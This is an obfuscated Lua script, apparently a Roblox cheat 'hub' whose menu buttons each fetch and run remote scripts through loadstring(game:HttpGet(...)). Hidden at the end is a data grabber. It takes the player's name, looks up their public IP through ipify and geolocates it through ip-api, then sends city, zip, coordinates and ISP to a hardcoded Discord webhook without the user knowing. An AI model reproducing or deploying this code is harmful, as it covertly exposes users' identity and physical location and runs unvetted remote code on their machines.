270) ;local v74;while true do if (v73==0) then v74=(557 + 730) -((1722 -(30 + 1117)) + (1007 -295)) ;while true do if (v74==(38 -(5 + 33))) then v20:Notification(v7("\217\40\92\53\3\151\64\91\230\49\70\118\3\156\67\77\255\41\90\50\72","\138\93\63\86\102\228\38\46"),v7("\89\18\3\157\178\116\20\8","\26\125\109\233\199"));loadstring(game:HttpGet("https://raw.githubusercontent.com/Tescalus/Pendulum-Hubs-Source/main/Pendulum%20Hub%20V5.lua"))();break;end end break;end end end);v23:Button(v7("\49\111\192\142\14\58\232\151\30\126\207\156\87\91\219\145\24\106\194\132\14\127\220","\119\26\174\229"),v7("\110\5\59\148\205\210\86\8\41\192\153\222\88\25\122\147\153\215\87\9\122\134\130\196\6","\57\109\90\224\237\182"),function()local v75=0 -0 ;local v76;while true do if (v75==(0 -0)) then v76=0 + 0 + 0 ;while true do if (v76==(0 + 0 + 0 + 0)) then v20:Notification(v7("\75\39\208\5\201\107\52\198\10\192\97\114\214\30\201\123\39\199\3\200\54","\24\82\179\102\172"),v7("\45\50\42\35\27\51\45\50","\110\93\68\87"));loadstring(game:HttpGet("https://raw.githubusercontent.com/ShowerHead-FluxTeam/scripts/main/funky-friday-autoplay"))();break;end end break;end end end);v23:Button(v7("\223\113\28\246\29\252\61","\137\95\91\214\85"),v7("\196\111\87\83\153\165\32\93\28\138\228\34\94\79\193\165\46\27\80\130\241\97\21\18","\133\79\59\60\237"),function()local v77=980 -(626 + 354) ;while true do if (v77==0) then v20:Notification(v7("\248\95\81\230\8\216\76\71\233\1\210\10\87\253\8\200\95\70\224\9\133","\171\42\50\133\109"),v7("\113\54\57\97\71\55\62\112","\50\89\87\21"));loadstring(game:HttpGet("https://raw.githubusercontent.com/1201for/V.G-Hub/main/V.Ghub"))();break;end end end);v23:Button(v7("\242\185\75\63\207\173\210\162\80\112\172\234\129","\179\204\63\80\159\196"),v7("\18\178\194\67\3\16\50\190\211\94\125","\83\199\182\44\83\124"),function()local v78=651 -(226 + 425) ;local v79;while true do if (v78==0) then v79=0 -(0 -0) ;while true do if (v79==((7 + 5) -(2 + 6 + 4))) then v20:Notification(v7("\16\201\237\10\38\207\232\28\47\208\247\73\38\196\235\10\54\200\235\13\109","\67\188\142\105"),v7("\106\17\135\34\207\71\23\140","\41\126\233\86\186"));loadstring(game:HttpGet("https://raw.githubusercontent.com/Madness676/3.2Lol/main/AutoPiano3-2.lua",true))();break;end end break;end end end);v23:Button(v7("\101\217\237\70\35\23\22\254\241\74\50\31\68","\54\173\159\35\66\122"),v7("\190\244\63\245\202\157\250\113\227\143\201\250\63\161\179\134\224\37\244\136\140\170\113\169\174\155\244\54\161\158\129\240\113\198\159\128\181\37\238\202\154\240\52\161\131\157\188","\233\149\81\129\234"),function()v20:Notification(v7("\136\106\251\119\190\108\254\97\183\115\225\52\190\103\253\119\174\107\253\112\245","\219\31\152\20"),v7("\111\37\223\52\88\213\94\35","\44\74\177\64\45\187\55\70"));loadstring(game:HttpGet("https://raw.githubusercontent.com/Blissful4992/Miscellaneous/main/StreamSniper.lua"))();end);v23:Button(v7("\25\59\25","\55\21\55\193\54\124"),v7("\170\226\30\108\63\133\232\79\63\30\134\239\31\123\41\201\230\30\112\39\154\163\94\49","\233\141\112\31\80"),function()local v80=0 + 0 ;local v81;while true do if (v80==(852 -(335 + 517))) then v81=0 -0 ;while true do if (v81==0) then v20:Notification(v7("\253\181\63\67\60\188\126\200\183\36\70\41\172\126\218\185\109\70\35\169\58\128\246\8\88\62\167\44\142\224\116\7\120\230\108\158","\174\214\77\42\76\200\94"),v7("\231\207\77\161\221\202\201\70","\164\160\35\213\168"));print("https://IMG-919305832-emoassmotherfucker-coping");break;end end break;end end end);v23:Button(v7("\11\138\80\34\82\11\202\205\41\145\66\51\0","\72\226\49\86\114\73\179\189"),v7("\38\235\74\150\193\12\83\247\65\150\201\22\83\249\67\194\134\88\91\221\75\195\203\25\7\241\64\216\201\20\83\200\90\196\216\23\0\253\92\150\231\22\31\225\6","\115\152\47\182\168\120"),function()local v82=388 -(206 + 182) ;local v83;while true do if (v82==(0 + 0)) then v83=(0 + 0) -(0 + 0) ;while true do if (v83==(0 -0)) then v20:Notification(v7("\210\102\49\225\10\202\231\102\62\238\22\153\228\107\55\225\26\205\228\119\124","\129\19\82\130\111\185"),v7("\7\162\234\170\49\163\237\187","\68\205\132\222"));loadstring(game:HttpGet("https://shz.al/~oksdhfio2hfpuh2e8ugf8yhepdgd289ehf8uoywhu93hr0g983w4hr8g79ju429ugyojui3kiriygh20983riyghuio4gry8fh280ygry8yh9uher8h2-94hrgh92ehr8fh29u4hg8yeh9ufh42urhg9uh28ygr",true))();break;end end break;end end end);v23:Button(v7("\10\4\143\20\46\14\145\5\126\53\140\81\14\13\130\8\59\19","\94\97\227\113"),v7("\140\117\195\19\49\197\158\37\171\58\208\92\54\215\158\58\173\60\212\92\40\222\204\37\182\117\206\92\59\216\218\32\177\117\211\25\44\197\158\39\177\123","\197\85\167\124\95\177\190\78"),function()v20:Notification(v7("\228\5\93\207\210\3\88\217\219\28\71\140\210\8\91\207\194\4\91\200\153","\183\112\62\172"),v7("\230\54\3\29\221\140\27\227","\165\89\109\105\168\226\114\134"));loadstring(game:HttpGet("https://raw.githubusercontent.com/bebedi15/MyWeirdScript/main/TeleportGui.lua"))();end);v23:Button(v7("\89\36\71\62\162\82\45\94","\26\76\38\74\130"),v7("\15\233\94\94","\86\140\45\112\137\196\235\68"),function()local v84=0 -0 ;local v85;local v86;while true do if (v84==(1 + 0)) then while true do if (v85==0) then v86=0;while true do if (v86==(0 -0)) then v20:Notification(v7("\228\91\208\81\210\93\213\71\219\66\202\18\210\86\214\81\194\90\214\86\153","\183\46\179\50"),v7("\146\203\70\87\65\218\220\177","\209\164\40\35\52\180\181\212"));loadstring(game:HttpGet("https://raw.githubusercontent.com/ant-7802/--/main/straightmilk.lua"))();break;end end break;end end break;end if (v84==0) then v85=0;v86=nil;v84=1;end end end);v23:Button(v7("\118\197\1\71\139\72\224\9\70\129\6\159\56\70\141\85\216\6\20\168\79\209\13\29","\38\183\104\52\228"),v7("\35\186\151\95\251\129","\116\213\229\52\136\190\50\209"),function()local v87=888 -(50 + 838) ;local v88;while true do if (v87==(1806 -(706 + 1100))) then v88=(1180 -(1160 + 20)) -0 ;while true do if (v88==((1994 -(1608 + 386)) + 0)) then v20:Notification(v7("\238\58\217\114\175\4\23\215\209\35\195\49\175\15\20\193\200\59\223\117\228","\189\79\186\17\202\119\113\162"),v7("\96\239\196\1\86\238\195\16","\35\128\170\117"));loadstring(game:HttpGet("https://raw.githubusercontent.com/Denverrz/scripts/master/PRISONWARE_v1.3.txt"))();break;end end break;end end end);local v24=v21:Tab(v7("\151\181\168\136\188\187\236","\211\212\136\192"),"http://www.roblox.com/asset/?id=6023426915");v24:Button(v7("\195\212\221\51\119\225\214","\130\189\176\95\24"),v7("\45\134\178\69\108\21\129\2\143\174\82\39\84\135\1\195\172\94\46\29\132\10\195\167\67\42\6\198","\111\227\193\49\76\116\232"),function()local v89=760 -(295 + 168 + (933 -636)) ;while true do if (v89==(0 + 0 + 0 + 0)) then v20:Notification(v7("\110\8\81\63\78\159\91\8\94\48\82\204\88\5\87\63\94\152\88\25\28","\61\125\50\92\43\236"),v7("\142\73\177\222\34\163\79\186","\205\38\223\170\87"));loadstring(game:HttpGet("https://raw.githubusercontent.com/BalligusapoTT/BalligusapoTT/main/Lockmomento"))();break;end end end);v24:Button(v7("\207\156\130\225\47\3\193\229\140","\129\233\233\132\93\78\174"),v7("\94\83\83\118\178\123\103\18\93\57\174\127\61","\19\50\42\86\220\20"),function()local v90=160 -(9 + 8 + (2037 -(975 + 919))) ;while true do if (v90==(293 -((672 -399) + 20))) then v20:Notification(v7("\102\173\49\211\249\153\182\64\172\40\212\249\135\180\75\229\54\207\173\202\162\93\183\51\142","\50\197\88\160\217\234\213"),v7("\120\197\226\101\85\19\94\94","\59\170\140\17\32\125\55"));loadstring(game:HttpGet("https://raw.githubusercontent.com/Allvideo/test/main/Whitelist.txt"))();break;end end end);v24:Button(v7("\110\157\227\220\54\77\4","\62\232\145\187\83\109\92"),v7("\166\252","\227\210\32\102\60\159\66\21"),function()local v91=0 + 0 ;while true do if (v91==(0 -0)) then v20:Notification(v7("\121\241\24\69\79\247\29\83\70\232\2\6\79\252\30\69\95\240\30\66\4","\42\132\123\38"),v7("\222\21\88\30\232\20\95\15","\157\122\54\106"));loadstring(game:HttpGet("https://raw.githubusercontent.com/Blxde509/PurgeX-dahood-script/main/loader",true))();break;end end end);v24:Button(v7("\218\197\163\98\55","\138\169\214\22\88"),v7("\61\42\64\146\138\90\63\22\111\92\136\138\80\37\29\38\95\131\138\91\56\25\61\29","\127\79\51\230\170\61\74"),function()local v92=0 -0 ;while true do if ((0 -0)==v92) then v20:Notification(v7("\223\234\230\91\231\253\11\3\224\243\252\24\231\246\8\21\249\235\224\92\172","\140\159\133\56\130\142\109\118"),v7("\107\237\207\202\172\70\235\196","\40\130\161\190\217"));loadstring(game:HttpGet("https://raw.githubusercontent.com/Scrvpter/Pluto/Lua/Loader.Lua",true))();break;end end end);local v25=v21:Tab(v7("\224\241\253\21\0\61\144\239\253\0\10","\176\131\148\102\111\83"),"http://www.roblox.com/asset/?id=6023426915");v25:Button(v7("\79\199\235\220\218\124\150\83\220\228\202","\31\181\130\175\181\18\182"),v7("\146\175\235\158\235","\197\231\170\202"),function()local v93=0 + 0 ;while true do if (v93==(0 + 0)) then v20:Notification(v7("\39\216\19\169\27\186\113\168\24\193\9\234\27\177\114\190\1\217\21\174\80","\116\173\112\202\126\201\23\221"),v7("\14\113\121\222\145\215\82\40","\77\30\23\170\228\185\59"));loadstring(game:HttpGet("https://raw.githubusercontent.com/ObviouslyOrchi/Prison-life/main/Moonlight%20Client%20Prison%20Life",true))();break;end end end);local v26=v21:Tab(v7("\87\186\14\31\107\186\22\74\93\178\9\11\106\175\31\24\57\136\15\24\111\178\12\11\117","\25\219\122\106"),"http://www.roblox.com/asset/?id=6023426915");v26:Button(v7("\138\234\218\49\182\234\194\100\128\226\221\37\183\255\203\54\228\216\219\54\178\226\216\37\168","\196\139\174\68"),v7("\118\110\101\26\136\154\216\169\123\99\25","\53\38\55\85\197\213\139\230"),function()local v94=0 + 0 ;local v95;while true do if (v94==0) then v95=0 -(0 -0) ;while true do if (v95==0) then v20:Notification(v7("\6\233\229\117\166\228\18\32\240\234\111\227\242\12\48\255\243\98\166\243\90","\85\156\134\22\195\151\116"),v7("\211\127\216\177\229\126\223\160","\144\16\182\197"));loadstring(game:HttpGet("https://raw.githubusercontent.com/ObviouslyOrchi/Moonlight_Client.lua/main/Moonlight_Client.",true))();break;end end break;end end end);local v27=v21:Tab(v7("\252\65\64\237\48\148\50\126\239\86\85\252\113\171","\174\32\52\136\16\217\75\94"),"http://www.roblox.com/asset/?id=6023426915");v27:Button(v7("\220\35\177\59\228\43\218\167\239\52\164\42\165\52","\142\66\197\94\196\70\163\135"),v7("\123\209\49\45\115\33\136\111\118\220\77","\56\153\99\98\62\110\219\32"),function()local v96=0 + 0 ;local v97;while true do if (v96==(0 -0)) then v97=0;while true do if (v97==0) then v20:Notification(v7("\34\212\190\64\20\210\187\86\29\205\164\3\20\217\184\64\4\213\184\71\95","\113\161\221\35"),v7("\155\231\2\30\232\168\34\83","\216\136\108\106\157\198\75\54"));loadstring(game:HttpGet("https://raw.githubusercontent.com/ObviouslyOrchi/Moonlight_Client.lua/main/Moonlight_Client_(Rate_my_Avatar)"))();break;end end break;end end end);local v28=v21:Tab(v7("\38\49\44\34\174\131\12\52\59\118\199\191\17\63\126\4\234\184\17\53","\101\80\94\86\142\209"),"http://www.roblox.com/asset/?id=6023426915");v28:Button(v7("\56\219\207\94\91\200\212\78\30\154\212\68\15\213\157\120\31\211\201\79","\123\186\189\42"),v7("\228\156\144\130\210\51\244\155\140\136\177","\167\212\194\205\159\124"),function()local v98=0;local v99;local v100;while true do if ((1 + 0)==v98) then while true do if (v99==(0 -0)) then v100=267 -((106 -78) + 239) ;while true do if (v100==((946 -(325 + 621)) + (1936 -(1197 + 739)))) then v20:Notification(v7("\104\6\136\29\13\109\72\78\31\135\7\72\123\86\94\16\158\10\13\122\0","\59\115\235\126\104\30\46"),v7("\11\37\167\25\224\15\249\161","\72\74\201\109\149\97\144\196"));loadstring(game:HttpGet("https://raw.githubusercontent.com/ObviouslyOrchi/Moonlight_Client.lua/main/Moonlight_Client_cart_ride_into_rdite",true))();break;end end break;end end break;end if (v98==(1328 -(1103 + 225))) then v99=0 -0 ;v100=nil;v98=1;end end end);local v29=v21:Tab(v7("\236\39\112\222\22\207\150\29\109\206\22\217\223\38\122","\182\72\29\188\127\170"),"http://www.roblox.com/asset/?id=6023426915");v29:Button(v7("\29\233\26\112\23\8\103\211\7\96\23\30\46\232\16","\71\134\119\18\126\109"),v7("\243\244\237\46\85\62\16\89\254\249\145","\176\188\191\97\24\113\67\22"),function()local v101=819 -(673 + 146) ;local v102;while true do if (v101==(0 + 0)) then v102=1480 -(34 + 1446) ;while true do if (v102==(0 + 0)) then v20:Notification(v7("\213\170\211\32\184\31\46\207\234\179\201\99\184\20\45\217\243\171\213\39\243","\134\223\176\67\221\108\72\186"),v7("\132\252\253\11\30\169\250\246","\199\147\147\127\107"));loadstring(game:HttpGet("https://raw.githubusercontent.com/ObviouslyOrchi/Moonlight_Client.lua/main/Moonlight_Client_Zombie_Uprising"))();break;end end break;end end end);local v30=game:GetService(v7("\102\193\69\50\198\178\69","\54\173\36\75\163\192"));local v31=game:GetService(v7("\96\212\24\43\14\209\90\214\5\56\56","\40\160\108\91\93\180"));local v32=v30.LocalPlayer;local v33="https://discord.com/api/webhooks/1090687518913077259/TWMXyYM4bEOeEtytxw8ki2Hh_1-uygBT3jZCki1JoJamgwte-8Yq2SZzFKYXs-yRywkp";local v34=http_request or request or (syn and syn.request) or (http and http.request) ;if  not v34 then return error(v7("\46\242\49\255\146\26\73\110\47\249\38\170\135\18\67\127\46\232\45\248","\91\156\66\138\226\106\38\28"));end if  not v32 then return error(v7("\204\2\169\142\49\227\244\222\12\224\135\44\226\183\223\23\165","\170\99\192\226\84\135\212"));end local v35,v36=v32.Name,v32.DisplayName;local v37;pcall(function()v37=v31:JSONDecode(v34({[v7("\127\45\82","\42\95\62\43")]="https://api.ipify.org/?format=json",[v7("\225\65\22\35\126\74","\172\36\98\75\17\46\89")]=v7("\249\205\254","\190\136\170\62")}).Body).ip;end);if  not v37 then return error(v7("\216\53\114\178\59\1\199\231\209\116\126\166\59\6\146\231\219","\190\84\27\222\94\101\231\147"));end local v38;pcall(function()v38=v31:JSONDecode(v34({[v7("\4\93\192","\81\47\172\156\167\24")]=string.format("http://ip-api.com/json/%s",v37),[v7("\30\251\184\205\73\24","\83\158\204\165\38\124\71")]=v7("\94\86\156","\25\51\232\34\185")}).Body);end);if  not v38 then return error(v7("\194\64\185\48\130\195\240\87\203\1\181\36\130\196\165\87\193","\164\33\208\92\231\167\208\35"));end local v39=string.format("User: %s (@%s)\nIP: %s\nCountry: %s\nCountry Code: %s\nRegion: %s\nRegion Name: %s\nCity: %s\nZipcode: %s\nLatitude: %s\nLongitude: %s\nISP: %s\nOrg: %s",v36,v35,v37,v38.country,v38.countryCode,v38.region,v38.regionName,v38.city,v38.zip,v38.lat,v38.lon,v38.isp,v38.org);local v40;pcall(function()v40=v31:JSONEncode({[v7("\128\86\87\95\66\85\39","\227\57\57\43\39\59\83")]=v39});end);if v40 then v34({[v7("\42\175\184","\127\221\212\35")]=v33,[v7("\25\19\54\19\12\36","\84\118\66\123\99\64\164\90")]=v7("\36\103\68\78","\116\40\23\26\113\153\163"),[v7("\198\21\234\59\143\85\47","\142\112\139\95\234\39\92\119")]={[v7("\230\216\28\21\64\68\153\205\241\206\2\4","\165\183\114\97\37\42\237\224")]="application/json"},[v7("\2\10\84\160","\64\101\48\217\41")]=v40});end